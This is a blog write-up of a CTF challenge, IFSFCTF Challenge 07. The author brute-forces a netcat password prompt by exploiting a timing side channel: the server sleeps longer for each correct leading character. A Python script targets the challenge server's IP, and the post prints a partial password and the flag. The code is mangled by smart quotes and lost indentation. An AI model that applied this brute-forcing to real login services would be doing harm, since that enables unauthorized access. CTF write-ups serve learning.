IFSFCTF – Challenge 07

I didn’t solve this challenge at time. But i was able to get the flag after the contest.
So what we have to do in this challenge is to telnet to a server and you have to enter a password to get the flag.


$ nc 208.64.122.27 3000
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
_ _ 99 _________ ______ ______ _ _ _____ ______ ______
\ \ / / | | | | | \ | | | | | | | | | | | | | | \ \ | |
>|--|< | | | | | | | |__| | | | | |--| | | | | | | | | |----
/_/ \_\ |_| |_| |_| |_| |_| |_|____ |_| |_| _|_|_ |_| |_| |_|____

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Authentication Required
Password :

The only way to do this was to Bruteforce.For this level it is necessary to have good coding skills and knowledge about multithreading (well… i didn’t had:/). But i managed to write a python code (very poor) to bruteforce using regular expressions. The peculiarity of this level is when you enter an correct alphabet as the password the server will sleep for 5 seconds. Similarly for the first two correct alphabets it will sleep for 10 seconds and xoxo..

#!/usr/bin/python

import socket
import time
import threading

submitted = “w3_0wn_7h15_f0r_r”
temppasswd = “”
charset = [“a”,”b”,”c”,”d”,”e”,”f”,”g”,”h”,”i”,”j”,”k”,”l”,”m”,”n”,”o”,”p”,”q”,”r”,”s”,”t”,”u”,”v”,”w”,”x”,”y”,”z”,”A”,”B”,”C”,”D”,”E”,”F”,”G”,”H”,”I”,”J”,”K”,”L”,”M”,”N”,”O”,”P”,”Q”,”R”,”S”,”T”,”U”,”V”,”W”,”X”,”Y”,”Z”,”0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″, “_”]
sleeptime = 85
add = [“\r”, “\n”]
fuckserver = (“208.64.122.27”, 3000)
count = 0
class Timer(threading.Thread):
def __init__(self, seconds):
self.runTime = seconds
threading.Thread.__init__(self)
def run(self):
time.sleep(self.runTime)
print “Buzzzz!! Time’s up!”

class CountDownTimer(Timer):
def run(self):
counter = self.runTime
for sec in range(self.runTime):
print counter
time.sleep(1.0)
counter -= 1
print “Done.”
counter = 0
while True:
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect(fuckserver)
print s1.makefile().readline().strip()
for char1 in charset:
count = 0
temppasswd = “”
temppasswd += submitted
temppasswd += char1
temppasswd += “\r\n”
print “Sending”
print temppasswd
s1.send(temppasswd)
c = CountDownTimer(sleeptime)
c.start()
print s1.makefile().readline().strip()

s1.close()

The problem with this code is it is not automated. Well i was completely concentrating on my screen while the bruteforcing was going on. But still i am happy that i cracked it offline šŸ™‚
The worst part was when you reach at the end of the password while bruteforcing you have wait for more then 90 seconds for each alphabets šŸ˜¦ Well You will take atleast 3 hours to solve this challenge if you use this code:(
The best part of this challenge was i didn’t know anything about python and multithreading before the contest was started. But i managed to learn those things šŸ™‚
And i would like to thank the organizers of the contest and the Google (oh yeah my knowledge guide)!!
+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-

Game Flag : 0xFEFERKJ8389743GH79G6D368GT093

+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s